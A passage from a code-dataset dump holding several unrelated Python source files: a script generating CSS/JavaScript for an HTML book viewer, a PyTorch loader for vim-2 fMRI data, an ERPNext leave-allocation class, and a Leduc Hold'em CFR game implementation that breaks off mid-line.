css_file += util.addCss(\n \".navbar\",\n \"background: white\",\n \"position: fixed\",\n \"top : 0px\",\n \"height:100%\",\n \"z-index:100\",\n \"-webkit-transition: all 0.3s ease\",\n \"-moz-transition: all 0.3s ease\",\n \"transition: all 0.3s ease\"\n )\n css_file += util.addCss(\n \".navbar h3\",\n \"color: white\",\n \"font-size: 1.9em\",\n \"padding: 20px\",\n \"margin: 0\",\n \"font-weight: 300\",\n \"background: var(--primary)\",\n \"float:left\"\n )\n css_file += util.addCss(\n \".navbar a\",\n \"display: block\",\n \"color: black\",\n \"font-size: 1.1em\",\n \"font-weight: 300\"\n )\n css_file += util.addCss(\n \".navbar a:hover\",\n \"background: var(--highlight)\",\n \"color:white\"\n )\n css_file += util.addCss(\n \".navbar a\",\n \"padding-top: 5px\",\n \"padding-bottom: 5px\",\n )\n css_file += util.addCss(\n \".navbar a:link\",\n \"text-decoration:none\"\n )\n css_file += util.addCss(\n \".dropdown-container\",\n \"display: none\",\n \"padding-left: 8px\"\n )\n css_file += util.addCss(\n \"#exitNavBar\", \"float:right\",\n \"cursor: pointer\"\n )\n css_file += util.addCss(\n \".navButton\",\n \"position: fixed\",\n \"top:10px\",\n \"background-color: var(--primary)\",\n \"width: 75px\",\n \"height: 75px\",\n \"border-radius: 50px\",\n \"grid-column-start: 1\",\n \"box-shadow:2px 2px 8px 2px darkgray\",\n \"cursor: pointer\"\n )\n css_file += util.addCss(\n \".bar\",\n \"width: 35px\",\n \"height: 5px\",\n \"background-color: white\",\n \"margin: 6px 20px\"\n )\n\n css_fd.write(css_file)\n css_fd.close()\n\n js_fd = open(filename + \".js\", \"w+\")\n \n js_file = util.constructString(\n \"function toggle(element){\",\n \"\\tlet obj = document.getElementById(element);\",\n \"\\tobj.style.display = obj.style.display === 'none' ? 'block' : 'none';\",\n \"}\\n\")\n\n js_file += util.constructString(\n \"let x_offset = 0;\",\n \"let y_offset = 0;\\n\",\n \"function beginDrag(e){\",\n \"\\tx_offset = e.clientX\",\n \"\\ty_offset = e.clientY\",\n \"}\\n\"\n\n \"function endDrag(e){\",\n \"\\tlet obj = e.target.parentNode;\",\n \n \"\\tlet x = x_offset - e.clientX;\",\n \"\\tlet y = y_offset - e.clientY;\",\n\n \"\\tobj.style.left = (obj.offsetLeft - x) + \\\"px\\\";\",\n \"\\tobj.style.top = (obj.offsetTop - y) + \\\"px\\\";\",\n \"}\\n\\n\",\n\n \"function dragstart_handler(e) {\",\n \"\\te.dataTransfer.setData(\\\"text/plain\\\", e.target.innerText);\",\n \"}\"\n )\n\n js_file += util.constructString(\n \"function moveToPosition(e, element){\",\n \"\\tlet obj = document.getElementById(element);\",\n \"\\tobj.style.left = e.pageX + 'px';\",\n \"\\tobj.style.top = e.pageY + 'px';\",\n \"}\"\n )\n js_file += util.constructString(\n \"document.addEventListener('DOMContentLoaded', function() {\",\n \"\\tmenuLeft = document.getElementById( 'navbar' );\",\n \"\\tbody = document.body;\",\n \"\\tshowLeft = document.getElementById( 'showLeft' );\",\n \"\\tmenuLeft.style.left = \\\"-500px\\\";\",\n \"\\tvar dropdown = document.getElementsByClassName(\\\"dropdown-btn\\\");\",\n \"\\tvar i;\",\n \"\\tfor (i = 0; i < dropdown.length; i++) {\",\n \"\\t\\tdropdown[i].addEventListener(\\\"click\\\", function() {\",\n \"\\t\\tthis.classList.toggle(\\\"active\\\");\",\n \"\\t\\tvar dropdownContent = this.nextElementSibling;\",\n \"\\t\\tdropdownContent.style.display = dropdownContent.style.display === \\\"none\\\" ? \\\"block\\\" : \\\"none\\\";\"\n \"\\t\\t});\",\n \"\\t}\",\n \"});\\n\"\n )\n js_file += util.constructString(\n \"function toggleNavBar(){\",\n \"\\tmenuLeft.style.left = menuLeft.style.left == \\\"0px\\\" ? \\\"-500px\\\" : \\\"0px\\\";\",\n \"}\"\n )\n\n js_fd.write(js_file)\n js_fd.close()\n return html_fd\n\ndef main():\n #get the name of the file to parse\n filename = ''\n if(len(sys.argv) < 2):\n filename = input(\"enter a .book file to parse\\n\")\n else:\n filename = sys.argv[1]\n\n\n #try and open the file\n try:\n fd = open(filename, \"r\")\n except IOError:\n print(\"Could not open \" + filename)\n sys.exit(1)\n\n #remove path and extension from filename\n file_location = os.path.basename(filename)\n filename = os.path.splitext(file_location)[0]\n\n #if the user gave a third param, make the book there\n if(len(sys.argv) == 3):\n try:\n os.chdir(sys.argv[2])\n except FileNotFoundError:\n #make the dir first\n os.mkdir(sys.argv[2])\n os.chdir(sys.argv[2])\n\n #create directories for book if they don't exist\n if not os.path.exists(filename):\n os.mkdir(filename)\n\n os.chdir(filename)\n\n if not os.path.exists(\"media\"):\n os.mkdir(\"media\")\n\n html_fd = initFile(filename)\n\n parser.parse(html_fd, fd)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"350497023","text":"import torch\nimport numpy as np\nfrom PIL import Image\nimport os\nimport glob\nimport random\nimport tqdm\n\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nclass Vim2Dataset(Dataset):\n def __init__(self, root_dir, is_val=False, subject_id=1,\n ignore_voxel_reponse = False,\n voxel_response_transform=None, stimuli_transform=None,\n add_noise=False, pre_resize_stimuli=False,\n debug=False, verbose=False):\n \"\"\"\n Initialised the Vim2Dataset\n Params :\n - root_dir : Root Directory of the dataset\n - is_val : Load the validation set ? Else load the Training set\n - subject_id : Subject ID for voxel response. Can accept [1,2,3]\n - ignore_voxel_reponse : Do not load voxel response (and pass random values) : False\n - voxel_response_transform : pytorch transform to be applied to voxel response\n - stimuli_transform : pytorch transform to be applied to the stimuli\n - add_noise : Either holds False when disabled, or [x,y] denoting the range in which to add noise\n - imsize : Resize stimuli images after loading to save time during training. (default : False)\n - debug : Print debug messages, return random tensors in debug mode\n - verbose : Boolean value indicating if we want to print logs in verbose mode\n \"\"\"\n self.root_dir = root_dir\n self.is_val=is_val\n self.subject_id = subject_id\n self.ignore_voxel_reponse = ignore_voxel_reponse\n self.voxel_response_transform = voxel_response_transform\n self.stimuli_transform = stimuli_transform\n self.add_noise = add_noise\n self.pre_resize_stimuli = pre_resize_stimuli\n self.debug = debug\n self.verbose = verbose\n\n self.stimuli_capture_frequency = 15 # 15 Hertz\n\n if not self.debug:\n self.validate_root_dir()\n assert self.subject_id in [1,2, 3]\n\n self.load_stimuli()\n if not self.ignore_voxel_reponse:\n self.load_voxel_response()\n\n def load_stimuli(self):\n if self.is_val:\n self.stimuli_path = os.path.join(self.root_dir, \"validation_stimuli.npy\")\n else:\n self.stimuli_path = os.path.join(self.root_dir, \"training_stimuli.npy\")\n\n if self.verbose:\n print(\"Loading Stimuli from : \", self.stimuli_path)\n\n self.stimuli = np.load(self.stimuli_path).astype(np.uint8)\n if self.pre_resize_stimuli:\n resized_stimuli_shape = [self.stimuli.shape[0]] + list(self.pre_resize_stimuli) + [self.stimuli.shape[-1]]\n self.resized_stimuli = np.zeros( resized_stimuli_shape ) # N, H, W, C\n for _idx in tqdm.tqdm(range(self.stimuli.shape[0])):\n im = Image.fromarray(np.uint8(self.stimuli[_idx]))\n im = im.resize(self.pre_resize_stimuli, resample=Image.NEAREST)\n self.resized_stimuli[_idx] = np.array(im).astype(np.uint8)\n del self.stimuli\n self.stimuli = self.resized_stimuli\n\n\n def load_voxel_response(self):\n if self.is_val:\n self.voxel_response_path = os.path.join(\n self.root_dir,\n \"VoxelResponses_subject{}_validation.npz\".format(self.subject_id)\n )\n else:\n self.voxel_response_path = os.path.join(\n self.root_dir,\n \"VoxelResponses_subject{}_training.npz\".format(self.subject_id)\n )\n\n if self.verbose:\n print(\"Loading Voxel Responses for Subject {} from : {}\".format(\\\n self.subject_id, self.voxel_response_path))\n\n self.voxel_responses = np.load(self.voxel_response_path)[\"arr_0\"]\n\n def __len__(self):\n if self.debug:\n return 1000\n else:\n return len(self.stimuli)\n\n def __getitem__(self, idx):\n # Obtain and prepare stimuli\n stimuli = self.stimuli[idx] # C x H x W\n stimuli = Image.fromarray(stimuli.astype('uint8'))\n\n if self.stimuli_transform:\n stimuli = self.stimuli_transform(stimuli)\n\n # Respons with the same voxel for all 15 stimuli captured at the timepoint\n if not self.ignore_voxel_reponse:\n voxel_response = self.voxel_responses[int(idx/self.stimuli_capture_frequency)]\n if self.voxel_response_transform:\n voxel_response = self.voxel_response_transform(voxel_response)\n\n voxel_response = torch.FloatTensor(voxel_response).unsqueeze(0)\n if self.add_noise:\n noise = torch.Tensor(1, 18, 64, 64)\n noise = torch.FloatTensor(1, 18, 64, 64).normal_(\n self.add_noise[0],\n self.add_noise[1]\n )\n voxel_response = torch.add(voxel_response, noise)\n else:\n voxel_response = torch.rand(1, 18, 64, 64)\n # shape : [1, 18, 64, 64] Depth x Width x Height\n # which gets added by the batch_size to finally become :\n # [batch_size, 1, 18, 64, 64]\n # where 1 is the number of channels\n return stimuli, voxel_response\n\n # im = Image.open(self.files[idx])\n # if self.transform is not None:\n # im = self.transform(im)\n # label = self.labels[idx]\n\n def validate_root_dir(self):\n expected_files = [ \\\n 'validation_stimuli.npy', \\\n 'training_stimuli.npy', \\\n 'VoxelResponses_subject1_training.npz', \\\n 'VoxelResponses_subject1_validation.npz', \\\n 'VoxelResponses_subject2_training.npz', \\\n 'VoxelResponses_subject2_validation.npz', \\\n 'VoxelResponses_subject3_training.npz',\\\n 'VoxelResponses_subject3_validation.npz']\n\n for _expected_file in expected_files:\n assert os.path.exists(os.path.join(self.root_dir, _expected_file))\n\nif __name__ == \"__main__\":\n\n # stimuli_transforms = transforms.Compose([\n # transforms.Resize((64, 64)),\n # transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n # ])\n stimuli_transforms = transforms.Compose([\n # transforms.Resize((64, 64)),\n transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n voxel_response_transforms = transforms.Compose([\n ])\n dataset = Vim2Dataset( \"data/vim-2\",\n subject_id=1,\n is_val=True,\n stimuli_transform = stimuli_transforms,\n voxel_response_transform=voxel_response_transforms,\n ignore_voxel_reponse = True,\n pre_resize_stimuli=(64, 64),\n debug=False,\n verbose=True)\n\n stimuli, voxel_response = dataset[0]\n print(\"Voxel Response \", voxel_response.shape, \" Stimuli : \", stimuli.shape)\n print(\"Voxel Response Mean \", voxel_response.mean(), \" Stimuli Mean : \", stimuli.mean())\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=100, shuffle=True)\n _idx = 0\n from tensorboardX import SummaryWriter\n\n writer = SummaryWriter(log_dir=\"./logs/gan_fMRI__run-1/\")\n import torchvision.utils as vutils\n\n _idx = 0\n for stimuli, voxel_response in data_loader:\n print(_idx, voxel_response.shape, stimuli.shape)\n std_coeff = torch.Tensor(stimuli.shape).fill_(0.5)\n mean_coeff = torch.Tensor(stimuli.shape).fill_(0.5)\n unint8_coeff = torch.Tensor(stimuli.shape).fill_(255.0)\n #\n real_images = torch.mul(stimuli, std_coeff)\n real_images = torch.add(real_images, mean_coeff)\n real_images = torch.mul(real_images, unint8_coeff)\n #\n real_images = stimuli[0:3]\n images = vutils.make_grid(torch.FloatTensor(real_images), normalize=True, scale_each=False)\n writer.add_image(\"/debug/image\", images, _idx)\n _idx += 1\n print(\"Actual Length : \", len(dataset))\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283102706","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.utils import cint, flt\nfrom frappe import _\nfrom frappe.model.document import Document\nfrom erpnext.hr.utils import set_employee_name\n\nclass LeaveAllocation(Document):\n\tdef validate(self):\n\t\tself.validate_new_leaves_allocated_value()\n\t\tself.check_existing_leave_allocation()\n\t\tif not self.total_leaves_allocated:\n\t\t\tself.total_leaves_allocated = self.new_leaves_allocated\n\n\t\tset_employee_name(self)\n\n\tdef on_update_after_submit(self):\n\t\tself.validate_new_leaves_allocated_value()\n\n\tdef on_update(self):\n\t\tself.get_total_allocated_leaves()\n\n\tdef on_cancel(self):\n\t\tself.check_for_leave_application()\n\n\tdef validate_new_leaves_allocated_value(self):\n\t\t\"\"\"validate that leave allocation is in multiples of 0.5\"\"\"\n\t\tif flt(self.new_leaves_allocated) % 0.5:\n\t\t\tfrappe.throw(_(\"Leaves must be allocated in multiples of 0.5\"))\n\n\tdef check_existing_leave_allocation(self):\n\t\t\"\"\"check whether leave for same type is already allocated or not\"\"\"\n\t\tleave_allocation = frappe.db.sql(\"\"\"select name from `tabLeave Allocation`\n\t\t\twhere employee=%s and leave_type=%s and fiscal_year=%s and docstatus=1\"\"\",\n\t\t\t(self.employee, self.leave_type, self.fiscal_year))\n\t\tif leave_allocation:\n\t\t\tfrappe.msgprint(_(\"Leaves for type {0} already allocated for Employee {1} for Fiscal Year {0}\").format(self.leave_type,\n\t\t\t\tself.employee, self.fiscal_year))\n\t\t\tfrappe.throw('{0}'.format(leave_allocation[0][0]))\n\n\tdef get_leave_bal(self, prev_fyear):\n\t\treturn self.get_leaves_allocated(prev_fyear) - self.get_leaves_applied(prev_fyear)\n\n\tdef get_leaves_applied(self, fiscal_year):\n\t\tleaves_applied = frappe.db.sql(\"\"\"select SUM(ifnull(total_leave_days, 0))\n\t\t\tfrom `tabLeave Application` where employee=%s and leave_type=%s\n\t\t\tand fiscal_year=%s and docstatus=1\"\"\",\n\t\t\t(self.employee, self.leave_type, fiscal_year))\n\t\treturn leaves_applied and flt(leaves_applied[0][0]) or 0\n\n\tdef get_leaves_allocated(self, fiscal_year):\n\t\tleaves_allocated = frappe.db.sql(\"\"\"select SUM(ifnull(total_leaves_allocated, 0))\n\t\t\tfrom `tabLeave Allocation` where employee=%s and leave_type=%s\n\t\t\tand fiscal_year=%s and docstatus=1 and name!=%s\"\"\",\n\t\t\t(self.employee, self.leave_type, fiscal_year, self.name))\n\t\treturn leaves_allocated and flt(leaves_allocated[0][0]) or 0\n\n\tdef allow_carry_forward(self):\n\t\t\"\"\"check whether carry forward is allowed or not for this leave type\"\"\"\n\t\tcf = frappe.db.sql(\"\"\"select is_carry_forward from `tabLeave Type` where name = %s\"\"\",\n\t\t\tself.leave_type)\n\t\tcf = cf and cint(cf[0][0]) or 0\n\t\tif not cf:\n\t\t\tfrappe.db.set(self,'carry_forward',0)\n\t\t\tfrappe.throw(_(\"Cannot carry forward {0}\").format(self.leave_type))\n\n\tdef get_carry_forwarded_leaves(self):\n\t\tif self.carry_forward:\n\t\t\tself.allow_carry_forward()\n\t\tprev_fiscal_year = frappe.db.sql(\"\"\"select name from `tabFiscal Year`\n\t\t\twhere year_start_date = (select date_add(year_start_date, interval -1 year)\n\t\t\t\tfrom `tabFiscal Year` where name=%s)\n\t\t\torder by name desc limit 1\"\"\", self.fiscal_year)\n\t\tprev_fiscal_year = prev_fiscal_year and prev_fiscal_year[0][0] or ''\n\t\tprev_bal = 0\n\t\tif prev_fiscal_year and cint(self.carry_forward) == 1:\n\t\t\tprev_bal = self.get_leave_bal(prev_fiscal_year)\n\t\tret = {\n\t\t\t'carry_forwarded_leaves': prev_bal,\n\t\t\t'total_leaves_allocated': flt(prev_bal) + flt(self.new_leaves_allocated)\n\t\t}\n\t\treturn ret\n\n\tdef get_total_allocated_leaves(self):\n\t\tleave_det = self.get_carry_forwarded_leaves()\n\t\tfrappe.db.set(self,'carry_forwarded_leaves',flt(leave_det['carry_forwarded_leaves']))\n\t\tfrappe.db.set(self,'total_leaves_allocated',flt(leave_det['total_leaves_allocated']))\n\n","sub_path":"python/erpnext/2015/4/leave_allocation.py","file_name":"leave_allocation.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265245976","text":"# coding: utf-8\n\nimport cfr_game\nimport numpy as np\nfrom cfr_game import CFRGame\n\n# LeducHoldEm is the following game.\n# The deck consists of (J, J, Q, Q, K, K).\n# Each player gets 1 card. There are two betting rounds and the number of raises in each round is at most 2.\n# In the second round, one card is revealed on the table and is used to create a hand.\n# There are two types of hands: pairs and highest card. There are three actions: fold, call and raise.\n# Each of the two players antes 1. In the first round, the betting amount is 2 (including the ante for the first bet).\n# In round 2 it is 4.\n# Player 1 starts round 1 and player 2 starts round 2.\n\n# Betting in Poker:\n# Bet: place a wager into the pot, or raise, by matching the outstanding bet and placing an extra bet into the pot.\n# Call: matching the amount of all outstanding bets (or check, by passing when there is no bet)\n# Fold: pass when there is an outstanding bet and forfeiting the current game.\n\n# So keep track of whether the previous player called or not. Note that the big blind is an initial bet.\n\n# Actions are: 0 - fold\n# 1 - call\n# 2 - raise\n\n# Rounds: 1 - pre-flop\n# 2 - flop\n\n# A dictionary that returns the other player.\nother_player = {1: 2, 2: 1}\n\nclass LeducCFR(CFRGame):\n\t# We interpret an empty action sequence as meaning the root of the game.\n\t# The next step is to sample the cards for the two players.\n\n\t# The deck is J, J, Q, Q, K, K. We represent J = 11, Q = 12, K = 13.\n\tdeck = [11,11,12,12,13,13]\n\tmax_raises_per_round = 2\n\tnum_rounds = 2\n\n\t# We just make a dictionary with the available actions (assuming a 2 raise maximum).\n\t# If the bet sequence isn't in this dictionary, it is invalid.\n\t# If we want to have a larger raise maximum, we should just make a tree to parse the\n\t# bet sequence, but this will do for now.\n\tavailable_actions_dict = {\n\t\t(): [1,2],\n\t\t(1,): [1,2],\n\t\t(1, 1): [],\n\t\t(1, 2): [0,1,2],\n\t\t(1, 2, 0): [],\n\t\t(1, 2, 1): [],\n\t\t(1, 2, 2): [0, 1],\n\t\t(1, 2, 2, 0): [],\n\t\t(1, 2, 2, 1): [],\n\n\t\t(2,): [0,1,2],\n\t\t(2, 0): [],\n\t\t(2, 1): [],\n\t\t(2, 2): [0, 1],\n\t\t(2, 2, 0): [],\n\t\t(2, 2, 1): []\n\t}\n\n\t# We represent actions as: fold = 0, call/check = 1, bet/raise = 2.\n\n\tdef __init__(self):\n\t\tself.reset()\n\n\t@staticmethod\n\tdef interpret_history(history):\n\t\t\"\"\" Validate the action sequence -- check it makes sense. If it's invalid, return an empty dictionary.\n\t\tOtherwise, returns a dictionary with: player to play, current pot, is it terminal, the information set.\n\t\t\"\"\"\n\t\tif len(history) == 0:\n\t\t\treturn [], []\n\n\t\t# A history of length 1 or 2 must consist of the hole cards.\n\t\tif len(history) <= 2:\n\t\t\tcards = history[:]\n\t\t\tfor card in cards:\n\t\t\t\tassert card in LeducCFR.deck\n\t\t\treturn cards, []\n\n\t\t# We first split into betting rounds.\n\t\t# Valid betting rounds are, as strings,\n\t\t# 'cc' <- first player called and second player checked.\n\t\t# 'r'**n + 'c', where n <= max_raises <- a sequence of n raises followed by a call.\n\t\t# 'r'**n + 'f', where n <= max_raises <- a sequence of n raises followed by a fold.\n\t\t# Note that even if n == max_raises, the last action played must be to call, so that\n\t\t# the next round is reached with both players having made equal bets.\n\n\t\tbet_sequences = []\n\t\tbet_sequence = []\n\t\tcards = []\n\t\tfor a in history:\n\t\t\tif not a in LeducCFR.deck:\n\t\t\t\tbet_sequence.append(a)\n\t\t\telse:\n\t\t\t\tcards.append(a)\n\t\t\t\tif len(bet_sequence) > 0:\n\t\t\t\t\tbet_sequences.append(bet_sequence)\n\t\t\t\t\tbet_sequence = []\n\t\t\n\t\t# We can also have a bet sequence without having drawn a card, and still need to add\n\t\t# this to bet_sequences.\n\t\tif len(bet_sequence) > 0:\n\t\t\tbet_sequences.append(bet_sequence)\n\n\t\t# Now interpret the bet sequences. There are either 0, 1 or 2 in a valid sequence\n\t\treturn cards, bet_sequences\n\n\t@staticmethod\n\tdef compute_bets(bet_sequences):\n\t\t\"\"\" Given 0, 1 or 2 bet sequences, compute the current bets by players 1 and 2.\n\t\t\"\"\"\n\t\t# Both players ante 1\n\t\tbets = {1: 1, 2: 1}\n\n\t\tassert len(bet_sequences) <= 2\n\n\t\tfor i, bet_sequence in enumerate(bet_sequences):\n\t\t\t# Player 1 starts the round 1 and player 2 starts round 2.\n\t\t\tplayer = 1 if i == 0 else 2\n\t\t\t# The raise amount is 2 in the first round and 4 in the second round.\n\t\t\traise_amount = 2 if i == 0 else 4\n\t\t\tfor bet_action in bet_sequence:\n\t\t\t\tif bet_action == 0:\n\t\t\t\t\t# Fold\n\t\t\t\t\treturn bets\n\t\t\t\telif bet_action == 1:\n\t\t\t\t\t# Check/call\n\t\t\t\t\t# Update the bet of the current player to equal the bet of the other player\n\t\t\t\t\tbets[player] = bets[other_player[player]]\n\t\t\t\telif bet_action == 2:\n\t\t\t\t\t# Bet/Raise\n\t\t\t\t\t# First call the bet of the other player, and then add the betting amount to\n\t\t\t\t\t# player's bet.\n\t\t\t\t\tbets[player] = bets[other_player[player]]\n\t\t\t\t\tbets[player] += raise_amount\n\t\t\t\t# Switch players\n\t\t\t\tplayer = other_player[player]\n\t\treturn bets\n\n\t@staticmethod\n\tdef available_actions(history):\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\t\t# If no bet sequences so far, then there better be two hole cards, and\n\t\t# we can set bet_sequence as []\n\t\tif len(bet_sequences) == 0:\n\t\t\tassert len(cards) == 2\n\t\t\tbet_sequence = []\n\t\telse:\n\t\t\t# If 1 bet sequence so far then we are either part way through the bet\n\t\t\t# sequence, or we have finished it. If we have finished it, then there\n\t\t\t# better be three cards drawn and we can set the bet sequence as [].\n\t\t\tif len(bet_sequences) == 1:\n\t\t\t\tif len(cards) == 3:\n\t\t\t\t\tbet_sequence = []\n\t\t\t\telse:\n\t\t\t\t\t# Only part way through first round.\n\t\t\t\t\tbet_sequence = bet_sequences[-1]\n\t\t\telif len(bet_sequences) == 2:\n\t\t\t\t# If 2 bet sequence then we are partway through the last round\n\t\t\t\tbet_sequence = bet_sequences[-1]\n\t\treturn LeducCFR.available_actions_bet_sequence(bet_sequence)\n\n\t@staticmethod\n\tdef available_actions_bet_sequence(bet_sequence):\n\t\t\"\"\" Given a single bet sequence (for one round), returns the available actions.\n\t\t\"\"\"\n\t\tbet_sequence_tuple = tuple(bet_sequence)\n\t\tassert bet_sequence_tuple in LeducCFR.available_actions_dict\n\t\treturn LeducCFR.available_actions_dict[bet_sequence_tuple]\n\n\t@staticmethod\n\tdef payoffs(history):\n\t\t\"\"\" If the action sequence is terminal, returns the payoffs for players\n\t\t1 and 2 in a dictionary with keys 1 and 2.\n\t\t\"\"\"\n\t\tassert LeducCFR.is_terminal(history)\n\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\t\thole_cards = {1: cards[0], 2: cards[1]}\n\n\t\tbets = LeducCFR.compute_bets(bet_sequences)\n\n\t\t# We have reached a terminal node, so we have to decide who won and give them the whole pot.\n\t\tpot = bets[1] + bets[2]\n\n\t\t# If 1 and 2 have the same hole cards, it's a draw, so split the pot. This means\n\t\t# both players gain 0, since they have the same amount in the pot.\n\t\tif hole_cards[1] == hole_cards[2]:\n\t\t\treturn {1: 0, 2: 0}\n\n\t\t# If the last action in the game was a fold, then that player loses and the other wins\n\t\t# The first player in round 2 is 2. Hence the last player is 2 if there are an even number of moves\n\t\t# and otherwise 1.\n\n\t\tif bet_sequences[0][-1] == 0:\n\t\t\t# If the last action in bet_sequences[0] is a fold, the game is over and the other player wins.\n\t\t\tlast_player = 1 if len(bet_sequences[0]) % 2 == 0 else 2\n\t\t\twinner = other_player[last_player]\n\t\telif bet_sequences[1][-1] == 0:\n\t\t\t# If the last action in bet_sequences[1] is a fold, then the game is over and the other player wins.\n\t\t\tlast_player = 2 if len(bet_sequences[1]) % 2 == 0 else 1\n\t\t\twinner = other_player[last_player]\n\t\telse:\n\t\t\t# Otherwise the last action was a call, so it goes to a showdown.\n\t\t\tflop = cards[2]\n\t\t\tif hole_cards[1] == flop:\n\t\t\t\twinner = 1\n\t\t\telif hole_cards[2] == flop:\n\t\t\t\twinner = 2\n\t\t\telse:\n\t\t\t\t# There is no pair, so the winner is the one with highest card. We already checked the\n\t\t\t\t# hole cards aren't equal.\n\t\t\t\twinner = 1 if hole_cards[1] > hole_cards[2] else 2\n\n\t\treturn {winner: float(pot)/2.0, other_player[winner]: -float(pot)/2.0}\n\n\t@staticmethod\n\tdef is_terminal(history):\n\t\t\"\"\" Return whether the history is terminal\n\t\t\"\"\"\n\t\t_, bet_sequences = LeducCFR.interpret_history(history)\n\t\treturn LeducCFR.is_terminal_bet_sequences(bet_sequences)\n\n\t@staticmethod\n\tdef is_terminal_bet_sequences(bet_sequences):\n\t\t\"\"\" Returns True/False if the bet_sequences is terminal or not.\n\t\t\"\"\"\n\t\t# We just check that there are no available actions to a player in the\n\t\t# last bet sequence.\n\t\t# A terminal bet sequences occurs if any player folded, or if we are in the second\n\t\t# bet sequence and there are no available actions.\n\t\tassert len(bet_sequences) <= 2\n\t\tif len(bet_sequences) == 0:\n\t\t\treturn False\n\t\telif len(bet_sequences) == 1:\n\t\t\t# If there is one bet sequence, then it is terminal if and only if the last\n\t\t\t# action was to fold.\n\t\t\tif bet_sequences[0][-1] == 0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\t# If the last action wasn't to fold, then we continue to the next round.\n\t\t\t\treturn False\n\t\tbet_sequence_tuple = tuple(bet_sequences[-1])\n\t\treturn len(LeducCFR.available_actions_dict[bet_sequence_tuple]) == 0\n\n\t@staticmethod\n\tdef which_player(history):\n\t\t\"\"\" Returns the player who is to play following the action sequence.\n\t\tReturns an error if played on a terminal history.\n\t\t\"\"\"\n\t\tassert not LeducCFR.is_terminal(history)\n\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\n\t\t# If the hole cards haven't been drawn yet, then sample these\n\t\tif len(cards) < 2:\n\t\t\treturn 0\n\n\t\t# Else the hole cards have been drawn. If no bet sequences, then it's\n\t\t# player 1's turn to play first\n\t\tif len(bet_sequences) == 0:\n\t\t\treturn 1\n\t\telif len(bet_sequences) == 1:\n\t\t\t# If there is a single bet sequence so far, it is either finished\n\t\t\t# (in which case it's chance's turn to draw the flop), or it isn't\n\t\t\t# finished, and one of the players still has to play. Or it is finished\n\t\t\t# and the flop card has already been drawn.\n\t\t\tavailable_actions = LeducCFR.available_actions_bet_sequence(bet_sequences[0])\n\t\t\tif len(available_actions) == 0:\n\t\t\t\t# Either the flop card has been drawn already or it hasn't.\n\t\t\t\tif history[-1] in LeducCFR.deck:\n\t\t\t\t\t# The last move in the history was the flop, so it's player 2 to \n\t\t\t\t\t# start round 2.\n\t\t\t\t\treturn 2\n\t\t\t\telse:\n\t\t\t\t\t# The last move in the history was a player ending the betting round,\n\t\t\t\t\t# so it's chance's turn to draw the flop.\n\t\t\t\t\treturn 0\n\t\t\telse:\n\t\t\t\treturn 1 if len(bet_sequences[0]) % 2 == 0 else 2\n\t\telse:\n\t\t\t# Otherwise there are two bet sequences, and we return the player to\n\t\t\t# play. Make sure it's not a terminal node. Since player 2 plays first\n\t\t\t# in round 2, it's player 2 to play if and only if an even number of\n\t\t\t# actions have been played in the second bet sequence.\n\t\t\tbet_sequence_tuple = bet_sequences[1]\n\t\t\tavailable_actions = LeducCFR.available_actions_bet_sequence(bet_sequence_tuple)\n\t\t\tassert len(available_actions) > 0\n\t\t\treturn 2 if len(bet_sequences[1]) % 2 == 0 else 1\n\n\t@staticmethod\n\tdef sample_chance_action(history):\n\t\t\"\"\" If the player for the game state corresponding to the action\n\t\tsequence is the chance player, then sample one of the available actions.\n\t\tReturn the action.\n\t\t\"\"\"\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\n\t\t# Assert that it is the chance player to play.\n\t\tassert LeducCFR.which_player(history) == 0\n\n\t\t# Copy the Leduc deck and remove cards that have already been drawn.\n\t\tdeck = LeducCFR.deck[:]\n\t\tfor card in cards:\n\t\t\tdeck.remove(card)\n\n\t\t# Just sample a card from the deck.\n\t\treturn np.random.choice(deck)\n\n\t@staticmethod\n\tdef information_set(history):\n\t\t\"\"\" Returns a unique hashable identifier for the information set\n\t\tcontaining the action sequence. This could be a tuple with the\n\t\tactions that are visible to the player. The information set belongs\n\t\tto the player who is to play following the action sequence.\n\t\t\"\"\"\n\t\tplayer = LeducCFR.which_player(history)\n\n\t\tassert player in [1,2]\n\t\tif player == 1:\n\t\t\treturn tuple([history[0]] + history[2:])\n\t\telse:\n\t\t\treturn tuple([history[1]] + history[2:])\n\n\tdef reset(self):\n\t\t\"\"\" Resets the game, and returns the information set and player to play.\n\t\tChance actions are automatically taken.\n\t\t\"\"\"\n\t\tself.history = []\n\t\twhile LeducCFR.which_player(self.history) == 0:\n\t\t\tself.history.append(LeducCFR.sample_chance_action(self.history))\n\n\t\tif LeducCFR.is_terminal(self.history):\n\t\t\tterminal = True\n\t\t\tpayoffs = LeducCFR.payoffs(self.history)\n\t\t\tplayer = None\n\t\t\tinformation_set = None\n\t\telse:\n\t\t\tterminal = False\n\t\t\tpayoffs = None\n\t\t\tplayer = LeducCFR.which_player(self.history)\n\t\t\tinformation_set = LeducCFR.information_set(self.history)\n\n\t\treturn player, information_set, terminal, payoffs\n\n\tdef play_action(self, action):\n\t\t\"\"\" Play the action in the game. Also plays any chance actions.\n\t\tReturns the player to play and the information set they are in.\n\t\tIf action is None, then play uniformly at random among available actions.\n\t\t\"\"\"\n\t\tif action is None:\n\t\t\tavailable_actions = LeducCFR.available_actions(self.history)\n\t\t\taction = np.random.choice(available_actions)\n\t\tassert action in 